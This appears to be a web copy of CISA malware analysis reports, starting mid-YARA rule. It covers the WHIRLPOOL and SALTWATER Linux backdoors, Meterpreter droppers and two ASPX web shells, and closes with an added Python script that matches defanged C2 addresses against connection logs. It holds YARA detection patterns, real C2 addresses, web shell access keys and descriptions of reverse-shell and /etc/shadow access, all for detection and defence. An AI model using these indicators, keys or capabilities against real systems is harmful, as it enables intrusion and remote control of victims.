           $s0 = { 65 72 72 6f 72 20 2d 31 20 65 78 69 74 }
           $s1 = { 63 72 65 61 74 65 20 73 6f 63 6b 65 74 20 65 72 72 6f 72 3a 20 25 73 28 65 72 72 6f 72 3a 20 25 64 29 }
           $s2 = { c7 00 20 32 3e 26 66 c7 40 04 31 00 }
           $a3 = { 70 6c 61 69 6e 5f 63 6f 6e 6e 65 63 74 }
           $a4 = { 63 6f 6e 6e 65 63 74 20 65 72 72 6f 72 3a 20 25 73 28 65 72 72 6f 72 3a 20 25 64 29 }
           $a5 = { 73 73 6c 5f 63 6f 6e 6e 65 63 74 }
       condition:
           uint32(0) == 0x464c457f and 4 of them
    }
ssdeep Matches

No matches found.

Relationships
9f04525835... Used_By 44e1fbe71c9fcf9881230cb924987e0e615a7504c3c04d44ae157f07405e3598
Description

This artifact, belonging to the WHIRLPOOL malware family, is a 64-bit Linux Executable and Linkable Format (ELF) file. The malware checks the processor hardware and architecture, including whether the target system uses an AMD or Intel processor (see Figure 4). Figure 5 shows the malware determining the kernel version by invoking the 'uname' command and reading the contents of the '/proc/sys/kernel/osrelease' file. Figures 6, 7, and 8 show the malware's capacity to connect to a remote address and then create a new process with the command line argument '/bin/sh'. The connection to a remote host and the invocation of a shell are the two components/phases of a reverse shell. Figure 9 shows the malware's capacity to interact with the Name Service Cache Daemon (nscd) by creating and connecting to a Unix socket at '/var/run/nscd/socket'. This socket can cache Domain Name System (DNS) requests; rather than listening on port 53, nscd listens on the socket file itself for data from other programs/processes. Figure 10 shows the malware's capacity to perform DNS resolution using the system call 'sys_getpeername'. The malware accesses the target's environment variables listed below:

--Begin Accessed Environment Variables--
GCONV_PATH
GETCONF_DIR
HTTPS_PROXY
HTTP_PROXY
LANG
LANGUAGE
LC_ALL
LC_COLLATE
LD_WARN
LD_LIBRARY_PATH
LD_BIND_NOW
LD_BIND_NOT
LD_DYNAMIC_WEAK
LD_PROFILE_OUTPUT
LD_ASSUME_KERNEL
LOCALDOMAIN
NO_PROXY
OPENSSL_CONF
OPENSSL_ia32cap
OUTPUT_CHARSET
POSIX
TZ
TZDIR
RESOLV_ADD_TRIM_DOMAINS
RESOLV_HOST_CONF
RESOLV_MULTI
RESOLV_OVERRIDE_TRIM_DOMAINS
RES_OPTIONS
RESOLV_REORDER
--End Accessed Environment Variables--

The malware further accesses the following files at runtime:

--Begin Accessed Files--
/etc/aliases
/etc/ethers
/etc/group
/etc/hosts
/etc/networks
/etc/protocols
/etc/passwd
/etc/rpc
/etc/services
/etc/gshadow
/etc/shadow
/etc/netgroup
/dev/full
/dev/urandom
/dev/random
/proc/sys/kernel/rtsig-
/proc/sys/kernel/ngroups_max
/sys/devices/system/cpu/online
/proc/stat
/proc/self/fd
--End Accessed Files--

Screenshots

Figure 4 - Figure 4 depicts the use of the 'cpuid' assembly instruction and strings amalgamating to 'intel' and 'AMD.'

Figure 5 - Figure 5 depicts the 'uname' Linux OS command line function. This figure further depicts a call to functions that open and read the contents of the path '/proc/sys/kernel/osrelease/.'

Figure 6 - Figure 6 depicts the creation of a socket that facilitates Internet Protocol Version 4 connections. It further depicts a connection to a remote address using the 'sys_connect' function.

Figure 7 - Figure 7 depicts the string 'sh -c /bin/sh' fed into the 'sys_execve' function as an argument.

Figure 8 - Figure 8 depicts the string 'sh -c /bin/sh' fed into the 'sys_execve' function as an argument.

Figure 9 - Figure 9 shows the malware's ability to interact with the Name Service Cache Daemon.

Figure 10 - Figure 10 depicts the Linux OS system call, 'sys_getpeername.'

caab341a35badbc65046bd02efa9ad2fe2671eb80ece0f2fa9cf70f5d7f4bedc

Tags

trojan

Details

Name mod_rft.so
Size 1668232 bytes
Type ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
MD5 4ec4ceda84c580054f191caa09916c68
SHA1 6505513ca06db10b17f6d4792c30a53733309231
SHA256 caab341a35badbc65046bd02efa9ad2fe2671eb80ece0f2fa9cf70f5d7f4bedc
SHA512 c61493cfa3c6c41520b6ef608da9398b4fa6a7805293bc98d628335f536509d95585d42f93b8edeabf971390e874c5291b552afe66d72651839a295b76c42380
ssdeep 24576:25gY/a9MQrLO457KIRTQvAunkEKkb8EHA4pje0ET1Nyb+YpYcNvwoQItHzUMDb:25b8y45V2IVEHASjezfYHwoDzUM
Entropy 6.211061
Malware Result unknown
Antivirus
AhnLab Malware/Linux.Agent
Antiy Trojan/Linux.SaltWater.b
Bitdefender Trojan.Linux.Generic.313776
Emsisoft Trojan.Linux.Generic.313776 (B)
ESET a variant of Linux/SaltWater.B trojan
McAfee Generic trojan.xj
Quick Heal ELF.WhirlPool.48041.GC
Sophos Linux/Agnt-BS
YARA Rules
  • rule CISA_10454006_13 : SALTWATER backdoor exploit_kit communicates_with_c2 determines_c2_server hides_executing_code exploitation
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10454006"
           date = "2023-08-10"
           last_modified = "20230905_1500"
           actor = "n/a"
           family = "SALTWATER"
           capabilities = "communicates-with-c2 determines-c2-server hides-executing-code"
           malware_type = "backdoor exploit-kit"
           tool_type = "exploitation"
           description = "Detects SALTWATER samples"
           sha256 = "caab341a35badbc65046bd02efa9ad2fe2671eb80ece0f2fa9cf70f5d7f4bedc"
       strings:
           $s1 = { 70 74 68 72 65 61 64 5f 63 72 65 61 74 65 }
           $s2 = { 67 65 74 68 6f 73 74 62 79 6e 61 6d 65 }
           $s3 = { 54 72 61 6d 70 6f 6c 69 6e 65 }
           $s4 = { 64 73 65 6c 64 73 }
           $s5 = { 25 30 38 78 20 28 25 30 32 64 29 20 25 2d 32 34 73 20 25 73 25 73 25 73 0a }
           $s6 = { 45 6e 74 65 72 20 6f 75 73 63 64 6f 6f 65 7c 70 72 65 64 61 72 65 28 25 70 2c 20 25 70 2c 20 25 70 29 }
           $s7 = { 45 6e 74 65 72 20 61 75 74 63 63 6f 6f 71 38 63 72 65 61 74 65 }
           $s8 = { 74 6e 6f 72 6f 74 65 63 74 6a 73 65 6d 6f 72 79 }
           $s9 = { 56 55 43 4f 4d 49 53 53 }
           $s10 = { 56 43 4f 4d 49 53 53 }
           $s11 = { 55 43 4f 4d 49 53 44 }
           $s12 = { 41 45 53 4b 45 59 47 45 4e 41 53 53 49 53 54 }
           $s13 = { 46 55 43 4f 4d 50 50 }
           $s14 = { 55 43 4f 4d 49 53 53 }
       condition:
           uint16(0) == 0x457f and filesize }
ssdeep Matches

No matches found.

Description

This artifact, belonging to the SALTWATER malware family, is a 32-bit Linux Shared Object (.so) file. The malware can take in data over the network, using a previously established socket, with the 'recv' function as shown in Figure 11. Figure 12 shows the malware creating a new thread within the calling process (thread injection); the new thread can run either of two different functions. Figure 13 shows the first function, which can perform DNS resolution. Figures 14 and 15 show the second function, which can establish communications over the network using a TLS version 1 connection. Lastly, using 'popen', the malware can execute any shell command with the same privileges as its calling process.

Screenshots
Figure 11 - Figure 11 depicts the 'recv' Berkeley Sockets function dynamically loaded and executed at runtime.
Figure 12 - Figure 12 depicts the 'pthread_create' function.
Figure 13 - Figure 13 depicts multiple functions from the Berkeley Sockets API.
Figure 14 - Figure 14 depicts functions that facilitate Secure Sockets Layer (SSL) and TLS communications.
Figure 15 - Figure 15 depicts the 'popen' function.

Relationship Summary

44e1fbe71c... Used 9f04525835f998d454ed68cfc7fcb6b0907f2130ae6c6ab7495d41aa36ad8ccf
9f04525835... Used_By 44e1fbe71c9fcf9881230cb924987e0e615a7504c3c04d44ae157f07405e3598

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

September 6, 2023

MAR-10430311-1.v1 Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475 | CISA

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:CLEAR--Recipients may share this information without restriction. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be shared without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

CISA received 4 files for analysis from an incident response engagement conducted at an Aeronautical Sector organization.

2 files (bitmap.exe, wkHPd.exe) are identified as variants of Metasploit (Meterpreter) and are designed to connect to and receive unencrypted payloads from their respective command and control (C2) servers. Note: Metasploit is an open source penetration testing software; Meterpreter is a Metasploit attack payload that runs an interactive shell. These executables are used as attack payloads to run interactive shells, allowing a malicious actor to control and execute code on a system.

2 files (resource.aspx, ConfigLogin.aspx) are Active Server Pages (ASPX) web shells designed to execute remote JavaScript code on the victim server.

CISA has provided indicators of compromise (IOCs) and YARA rules for detection within this Malware Analysis Report (MAR).

For more information about this compromise, see Joint Cybersecurity Advisory Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475.

Download the PDF version of this report:

For a downloadable copy of IOCs associated with this MAR in JSON format, see:

AR23-250A JSON (JSON, 57.41 KB )
Submitted Files (4)

334c2d0af191ed96b15095a4a098c400f2c0ce6b9c66d1800f6b74554d59ff4b (bitmap.exe)

47dacb8f0b157355a4fd59ccbac1c59b8268fe84f3b8a462378b064333920622 (resource.aspx)

6dcc7b5e913154abac69687fcfb6a58ac66ec9b8cc7de7afd8832a9066b7bdde (ConfigLogin.aspx)

79a9136eedbf8288ad7357ddaea3a3cd1a57b7c6f82adffd5a9540e1623bfb63 (wkHPd.exe)

IPs (2)

108[.]62[.]118[.]160

179[.]60[.]147[.]4

Findings

334c2d0af191ed96b15095a4a098c400f2c0ce6b9c66d1800f6b74554d59ff4b

Tags

downloader, obfuscated, trojan

Details


Name bitmap.exe
Size 7168 bytes
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 b8967a33e6c1aee7682810b6b994b991
SHA1 bbda2ad0634aa535b9df40dc39a2d4dfdd763476
SHA256 334c2d0af191ed96b15095a4a098c400f2c0ce6b9c66d1800f6b74554d59ff4b
SHA512 75b86d329c06a60b395d539eead76f27bc4055a9743f6f33bc48b4ef54a5d0587fbfaf9742515e73936df2b6a5498a84ae8c501f0f27b6c047e994f3afcc408d
ssdeep 24:eFGStrJ9u0/6BonZdkBQAV7YQKZqSeNDMSCvOXpmB:is0M8kBQDQkSD9C2kB
Entropy 1.315361
Malware Result unknown
Antivirus
AhnLab Trojan/Win64.Shelma
Antiy GrayWare/Win32.Rozena.j
Avira TR/Crypt.XPACK.Gen7
Bitdefender Trojan.Metasploit.A
CrowdStrike Falcon ML win/malicious_confidence_100
Cylance Malware
Emsisoft Trojan.Metasploit.A (B)
ESET a variant of Win64/Rozena.M trojan
Huorong Trojan/Obfuscated.dq
IKARUS Trojan.Win64.Meterpreter
K7 Trojan ( 004fae881 )
McAfee Trojan-FJIN!B8967A33E6C1
Quick Heal HackTool.Metasploit.S9212471
Sophos ATK/Meter-A
Varist W64/S-c4a4ef26!Eldorado
Vir.IT eXplorer Trojan.Win32.Generic.BZPS
Webroot SMD Malware
YARA Rules
  • rule CISA_10430311_01 : METERPRETER trojan downloader
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10430311"
           date = "2023-03-03"
           last_modified = "20230404_1200"
           actor = "n/a"
           family = "METERPRETER"
           Capabilities = "n/a"
           Malware_Type = "trojan downloader"
           Tool_Type = "n/a"
           description = "Detects trojan downloader samples"
           sha256_1 = "334c2d0af191ed96b15095a4a098c400f2c0ce6b9c66d1800f6b74554d59ff4b"
       strings:
           $s1 = { 49 be 77 73 32 5f 33 32 }
           $s2 = { 49 89 e6 48 81 ec a0 01 }
           $s3 = { 49 bc 02 00 e5 6b b3 3c 93 04 }
           $s4 = { 41 ba 4c 77 26 07 ff d5 }
           $s5 = { 41 ba ea 0f df e0 ff d5 }
           $s6 = { 41 ba 99 a5 74 61 ff d5 }
           $s7 = { 41 ba 02 d9 c8 5f ff d5 }
           $s8 = { 41 ba 58 a4 53 e5 ff d5 }
       condition:
           all of them
    }
  • rule CISA_10430311_02 : METERPRETER controls_local_machine compromises_data_integrity communicates_with_c2 keylogger exploit_kit remote_access_trojan back downloader screen_capture virus remote_access exploitation network_capture
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10430311"
           date = "2023-03-08"
           last_modified = "20230405_1300"
           actor = "n/a"
           family = "METERPRETER"
           Capabilities = "controls-local-machine compromises-data-integrity communicates-with-c2"
           Malware_Type = "keylogger exploit-kit remote-access-trojan backdoor downloader screen-capture virus"
           Tool_Type = "remote-access exploitation network-capture"
           description = "Detects Fresh Meterpreter binary samples"
           sha256_1 = "79a9136eedbf8288ad7357ddaea3a3cd1a57b7c6f82adffd5a9540e1623bfb63"
           sha256_2 = "334c2d0af191ed96b15095a4a098c400f2c0ce6b9c66d1800f6b74554d59ff4b"
           sha256_3 = "6dcc7b5e913154abac69687fcfb6a58ac66ec9b8cc7de7afd8832a9066b7bdde"
           sha256_4 = "47dacb8f0b157355a4fd59ccbac1c59b8268fe84f3b8a462378b064333920622"
       strings:
           $s0 = { 58 a4 53 e5 }
           $s1 = { 02 d9 c8 5f }
           $s2 = { 99 a5 74 61 }
           $s3 = { 4c 77 26 07 }
           $s4 = { 29 80 6b 00 }
           $s5 = { 50 41 59 4c 4f 41 44 3a }
           $s6 = { 48 83 ec 28 49 c7 c1 40 }
       condition:
           all of them
    }
ssdeep Matches

No matches found.

Relationships
334c2d0af1... Connected_To 179[.]60[.]147[.]4
Description

This artifact is a malicious Windows executable file. The file is designed to connect to the remote Internet Protocol (IP) address "179[.]60[.]147[.]4" on Transmission Control Protocol (TCP) port 58731 and wait for a response. The response payload from the remote server is not encrypted and is executed in memory. The payload was not available for analysis.

179[.]60[.]147[.]4

Tags

command-and-control

Ports
  • 58731 TCP
Whois

inetnum:     179.60.147.0/24
status:     reallocated
aut-num:     AS209588
owner:     Cloud Solutions S.A.
ownerid:     VE-CSSA1-LACNIC
responsible: Alexis Sanchez
address:     Av. Libertador, Distrito Capital, ---,
address:     1050 - Caracas -
country:     VE
phone:     +507 8589115
owner-c:     ALS317
tech-c:     ALS317
abuse-c:     ALS317
inetrev:     179.60.147.0/24
nserver:     NS1.SAFE-VPN.MOBI
nsstat:     20230302 AA
nslastaa:    20230302
nserver:     NS2.SAFE-VPN.MOBI
nsstat:     20230302 AA
nslastaa:    20230302
created:     20220301
changed:     20220301
inetnum-up: 179.60.144.0/21

nic-hdl:     ALS317
person:     Alexis Sanchez
e-mail:     [email protected]
address:     Av. Libertador, Distrito Capital, ---, ---
address:     1050 - Caracas -
country:     VE
phone:     +507 858 91 [15]
created:     20220301
changed:     20220301

Relationships
179[.]60[.]147[.]4 Connected_From 334c2d0af191ed96b15095a4a098c400f2c0ce6b9c66d1800f6b74554d59ff4b
Description

The malware C2 server IP address.

79a9136eedbf8288ad7357ddaea3a3cd1a57b7c6f82adffd5a9540e1623bfb63

Tags

obfuscated, trojan

Details


Name wkHPd.exe
Size 7168 bytes
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 76adb0e36aac40cae0ebeb9f4bd38b52
SHA1 82885f8c57cf4460f52db0a85e183d372f0aeb7e
SHA256 79a9136eedbf8288ad7357ddaea3a3cd1a57b7c6f82adffd5a9540e1623bfb63
SHA512 dc3547ca38bcdc00184537f9b2bac6201d9aa1541d172fc78050636b5f0d2c438defcab937f2ac056a0522c9727d2c3ea1636c69c9780ed553b146168956c121
ssdeep 24:eFGStrJ9u0/6kgnZdEBQAVXBYLYKZq4eNDMSeGV1iY0im+opmB:is0dUEBQpLYGSD9e8oYKkB
Entropy 1.418888
Malware Result unknown
Antivirus
AhnLab Trojan/Win64.Agent
Antiy GrayWare/Win32.Rozena.j
Avira TR/Crypt.XPACK.Gen7
Bitdefender Trojan.Metasploit.A
CrowdStrike Falcon ML win/malicious_confidence_100
Cylance Malware
Emsisoft Trojan.Metasploit.A (B)
ESET a variant of Win64/Rozena.M trojan
Huorong Trojan/Obfuscated.dq
IKARUS Trojan.Win64.Meterpreter
K7 Trojan ( 004fae881 )
McAfee Trojan-FJIN!76ADB0E36AAC
Quick Heal HackTool.Metasploit.S9212471
Sophos ATK/Meter-A
Varist W64/S-c4a4ef26!Eldorado
Vir.IT eXplorer Trojan.Win32.Generic.BZPS
Webroot SMD Malware
YARA Rules
  • rule CISA_10430311_02 : METERPRETER controls_local_machine compromises_data_integrity communicates_with_c2 keylogger exploit_kit remote_access_trojan back downloader screen_capture virus remote_access exploitation network_capture
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10430311"
           date = "2023-03-08"
           last_modified = "20230405_1300"
           actor = "n/a"
           family = "METERPRETER"
           Capabilities = "controls-local-machine compromises-data-integrity communicates-with-c2"
           Malware_Type = "keylogger exploit-kit remote-access-trojan backdoor downloader screen-capture virus"
           Tool_Type = "remote-access exploitation network-capture"
           description = "Detects Fresh Meterpreter binary samples"
           sha256_1 = "79a9136eedbf8288ad7357ddaea3a3cd1a57b7c6f82adffd5a9540e1623bfb63"
           sha256_2 = "334c2d0af191ed96b15095a4a098c400f2c0ce6b9c66d1800f6b74554d59ff4b"
           sha256_3 = "6dcc7b5e913154abac69687fcfb6a58ac66ec9b8cc7de7afd8832a9066b7bdde"
           sha256_4 = "47dacb8f0b157355a4fd59ccbac1c59b8268fe84f3b8a462378b064333920622"
       strings:
           $s0 = { 58 a4 53 e5 }
           $s1 = { 02 d9 c8 5f }
           $s2 = { 99 a5 74 61 }
           $s3 = { 4c 77 26 07 }
           $s4 = { 29 80 6b 00 }
           $s5 = { 50 41 59 4c 4f 41 44 3a }
           $s6 = { 48 83 ec 28 49 c7 c1 40 }
       condition:
           all of them
    }
ssdeep Matches

No matches found.

Relationships
79a9136eed... Connected_To 108[.]62[.]118[.]160
Description

This file is a malicious 64-bit Windows Portable Executable (PE) that has been identified as a variant of the Metasploit Meterpreter application. The file is designed to connect to a remote Internet Protocol (IP) address 108[.]62[.]118[.]160.

108[.]62[.]118[.]160

Tags

command-and-control

Whois

NetRange:     108.62.0.0 - 108.62.255.255
CIDR:         108.62.0.0/16
NetName:        NET-108-62-0-0-1
NetHandle:     NET-108-62-0-0-1
Parent:         NET108 (NET-108-0-0-0-0)
NetType:        Direct Allocation
OriginAS:     AS15003
Organization: Leaseweb USA, Inc. (LU)
RegDate:        2010-12-13
Updated:        2021-02-15
Ref:            https://rdap.arin.net/registry/ip/108.62.0.0

OrgName:        Leaseweb USA, Inc.
OrgId:         LU
Address:        9480 Innovation Dr
City:         Manassas
StateProv:     VA
PostalCode:     20109
Country:        US
RegDate:        2010-09-13
Updated:        2019-08-13
Comment:        www.leaseweb.com
Ref:            https://rdap.arin.net/registry/entity/LU

Relationships
108[.]62[.]118[.]160 Connected_From 79a9136eedbf8288ad7357ddaea3a3cd1a57b7c6f82adffd5a9540e1623bfb63
Description

The malware attempts to connect to this IP address.

47dacb8f0b157355a4fd59ccbac1c59b8268fe84f3b8a462378b064333920622

Tags

backdoor, webshell

Details


Name resource.aspx
Size 175 bytes
Type ASCII text, with no line terminators
MD5 1a0e111e60e543810423ef073b545c77
SHA1 23cb74b530c49837595d766492279cc0cdc4692d
SHA256 47dacb8f0b157355a4fd59ccbac1c59b8268fe84f3b8a462378b064333920622
SHA512 78a6e59bb9d9320d39249ee8ae94431a7cda608476f0adc9358e558b535ceccf12e219af16b14a40948986a01ad9128f8cf0240cde866197570fd70772e92d1c
ssdeep 3:6DZXA/fTGYpEHJCpHT55bct7fk8fwM2aA793nJKAqTGwPW1kyKN+1Ucv2+:6e3q+ugFIt7M8fwM/A7zKAqK6ykycKUU
Entropy 5.673036
Malware Result unknown
Antivirus
Huorong Backdoor/ASP.WebShell.aa
YARA Rules
  • rule CISA_10430311_03 : ASPX_WEBSHELL webshell
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10430311"
           date = "2023-03-21"
           last_modified = "20230404_1230"
           actor = "n/a"
           family = "ASPX Webshell"
           Capabilities = "n/a"
           Malware_Type = "webshell"
           Tool_Type = "n/a"
           description = "Detects OWA targeting ASPX Webshell samples"
           sha256_1 = "6dcc7b5e913154abac69687fcfb6a58ac66ec9b8cc7de7afd8832a9066b7bdde"
           sha256_2 = "47dacb8f0b157355a4fd59ccbac1c59b8268fe84f3b8a462378b064333920622"
       strings:
           $s1 = { 5a 30 32 6a 77 36 43 36 63 55 }
           $s2 = { 5a 38 49 30 32 38 33 6e 77 38 }
           $s3 = { 4f 57 41 77 65 62 63 6f 6e 66 69 67 }
           $s4 = { 54 55 43 53 4f 4e }
           $s5 = { 65 76 61 6c }
       condition:
           3 of them
    }
ssdeep Matches

No matches found.

Description

This artifact is an ASPX webshell that is designed to execute remote JavaScript code on the system. The attacker must authenticate to the webshell client with the key "OWAwebconfig" before executing the remote code. The 'unsafe' context keyword is intentionally obfuscated to bypass security protocols.

Screenshots

6dcc7b5e913154abac69687fcfb6a58ac66ec9b8cc7de7afd8832a9066b7bdde

Tags

backdoor, webshell

Details


Name ConfigLogin.aspx
Size 169 bytes
Type ASCII text, with no line terminators
MD5 a33354d598b58f2e55eb3619c3465f24
SHA1 e1c6f76085234554e9a47b61105cd45981eb35d2
SHA256 6dcc7b5e913154abac69687fcfb6a58ac66ec9b8cc7de7afd8832a9066b7bdde
SHA512 180ee1378ff6ffd8b28c39208d8abb617e263defc74f6781f9f8efa373fd62c3aa0b99a4b77cf44432f9bfe4fd80f40620ffb884af2e440491d007b2e41e4d96
ssdeep 3:6DZX6VeeTEdYpEHJCpRZT55bcRRt+ek8fwM2aA42qPJKMWmdeuufKVeM+1Ucv2+:6NeTG+ug/JIi8fwM/A7qxKMWmgZMKUeb
Entropy 5.682974
Malware Result unknown
Antivirus
Huorong Backdoor/ASP.WebShell.aa
YARA Rules
  • rule CISA_10430311_03 : ASPX_WEBSHELL webshell
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10430311"
           date = "2023-03-21"
           last_modified = "20230404_1230"
           actor = "n/a"
           family = "ASPX Webshell"
           Capabilities = "n/a"
           Malware_Type = "webshell"
           Tool_Type = "n/a"
           description = "Detects OWA targeting ASPX Webshell samples"
           sha256_1 = "6dcc7b5e913154abac69687fcfb6a58ac66ec9b8cc7de7afd8832a9066b7bdde"
           sha256_2 = "47dacb8f0b157355a4fd59ccbac1c59b8268fe84f3b8a462378b064333920622"
       strings:
           $s1 = { 5a 30 32 6a 77 36 43 36 63 55 }
           $s2 = { 5a 38 49 30 32 38 33 6e 77 38 }
           $s3 = { 4f 57 41 77 65 62 63 6f 6e 66 69 67 }
           $s4 = { 54 55 43 53 4f 4e }
           $s5 = { 65 76 61 6c }
       condition:
           3 of them
    }
ssdeep Matches

No matches found.

Description

This artifact is an ASPX webshell that is designed to execute remote JavaScript code on the system. The attacker must authenticate to the webshell client with the key "TUCSON" before executing the remote code. The 'unsafe' context keyword is intentionally obfuscated to bypass security protocols.

Screenshots

Relationship Summary

334c2d0af1... Connected_To 179[.]60[.]147[.]4
179[.]60[.]147[.]4 Connected_From 334c2d0af191ed96b15095a4a098c400f2c0ce6b9c66d1800f6b74554d59ff4b
79a9136eed... Connected_To 108[.]62[.]118[.]160
108[.]62[.]118[.]160 Connected_From 79a9136eedbf8288ad7357ddaea3a3cd1a57b7c6f82adffd5a9540e1623bfb63
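As an added example (not part of the report), the Python below refangs the two C2 indicators listed in the Relationship Summary above and matches them against connection-log rows. The rows are constructed, the Zeek-style conn.log column order is an assumption, and the TCP port 58731 for 179[.]60[.]147[.]4 comes from the bitmap.exe description; the report gives no port for 108[.]62[.]118[.]160, so that indicator matches on address alone.

```python
# Added example, not part of the CISA report: refang the defanged C2 indicators
# from the Relationship Summary and match them against constructed connection
# log rows. The log layout (Zeek-style conn.log subset) is an assumption.
import ipaddress

# Indicators exactly as printed in the report. The port for 179[.]60[.]147[.]4
# comes from the bitmap.exe description; none is given for 108[.]62[.]118[.]160.
DEFANGED_IOCS = {
    "179[.]60[.]147[.]4": {58731},
    "108[.]62[.]118[.]160": set(),
}


def refang(indicator: str) -> str:
    """Turn '179[.]60[.]147[.]4' (or '(.)' / '[dot]' styles) back into a real address."""
    cleaned = (indicator.strip()
               .replace("[.]", ".").replace("(.)", ".").replace("[dot]", "."))
    return str(ipaddress.ip_address(cleaned))   # raises ValueError on junk input


def load_iocs(defanged: dict) -> dict:
    """Map refanged address -> set of expected ports (empty set = port unknown)."""
    return {refang(ip): ports for ip, ports in defanged.items()}


def parse_conn_row(line: str):
    """Columns: ts uid orig_h orig_p resp_h resp_p proto (tab or space separated)."""
    fields = line.split()
    if len(fields) < 7 or line.startswith("#"):
        return None
    return {"ts": fields[0], "uid": fields[1], "orig_h": fields[2],
            "orig_p": int(fields[3]), "resp_h": fields[4],
            "resp_p": int(fields[5]), "proto": fields[6]}


def match_connections(lines, iocs):
    """Return (uid, address, port, confidence) for every row touching an IOC."""
    hits = []
    for line in lines:
        row = parse_conn_row(line)
        if row is None:
            continue
        # Check both ends of the connection; the C2 may appear as responder or originator.
        for host_field, port_field in (("resp_h", "resp_p"), ("orig_h", "orig_p")):
            ports = iocs.get(row[host_field])
            if ports is None:
                continue
            if not ports:
                confidence = "ip-only (no port in report)"
            elif row[port_field] in ports:
                confidence = "ip+port"
            else:
                confidence = "ip match, port differs"
            hits.append((row["uid"], row[host_field], row[port_field], confidence))
    return hits


# Constructed conn.log rows (not real telemetry); 10.0.0.0/8 hosts are the internal side.
SAMPLE_LOG = """\
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto
1693950000.123 CAbcd1 10.0.0.5 51012 179.60.147.4 58731 tcp
1693950001.456 CAbcd2 10.0.0.5 51013 93.184.216.34 443 tcp
1693950002.789 CAbcd3 10.0.0.7 51014 108.62.118.160 8443 tcp
1693950003.012 CAbcd4 10.0.0.9 51015 179.60.147.4 443 tcp
""".splitlines()

IOCS = load_iocs(DEFANGED_IOCS)

if __name__ == "__main__":
    for hit in match_connections(SAMPLE_LOG, IOCS):
        print(hit)
```

A row that reaches the indicator address on a different port is still reported, only with lower confidence: the report documents one port per sample, and the same infrastructure may serve other payloads on other ports.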

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

